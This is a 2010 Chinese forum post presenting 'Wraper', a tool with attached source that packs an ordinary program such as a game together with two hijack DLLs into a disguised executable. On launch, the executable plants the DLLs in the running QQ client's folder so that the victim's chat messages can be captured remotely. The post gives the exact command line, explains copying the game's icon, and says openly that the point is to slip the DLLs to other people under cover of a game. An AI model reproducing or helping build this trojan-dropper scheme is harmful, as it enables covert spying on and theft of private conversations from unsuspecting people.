-
-
[原创]QQ聊天信息远程获取一点小改进
-
发表于:
2010-11-14 23:40
8675
-
本贴是在看了踏雪流云的《利用qq2010聊天信息获取,打造自己的远程控制》制作的QQ聊天信息远程获取小工具。请参考着阅读。
http://bbs.pediy.com/showthread.php?p=888526#post888526
工具Wraper的功能是把im32.dll,msimg32.dll,abc.exe(任意程序)打包成一个程序,为了让打包后的能释放执行程序,还需要用到一个header.exe
使用方法例如:
Wraper.exe -h Header.exe -g game.exe -d im32.dll -d msimg32.dll -o fake_game.exe
fake_game.exe运行时把game.exe释放到temp目录下并执行,把im32.dll,msimg32.dll释放到QQ安装路径下(qq是绿色软件,注册表中的安装路径不一定正确,这里用的方法是枚举进程,获取image path的方法,所以只有QQ在运行的时候才能找到QQ的image path)
为了能让fake_game.exe的图标和game.exe的图标一样,还需要修正资源节的信息。
总结下Wraper作用下:header.exe+abc.exe+n个xyx.dll=fake_abc.exe
反正就是把我们需要‘送’给别人dll,打包成游戏之类的东西,悄悄的送给别人。
这里上传wraper和header的源代码。
WraperHeader获取聊天记录.rar
其他代码可以在踏雪流云帖子中下载。
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
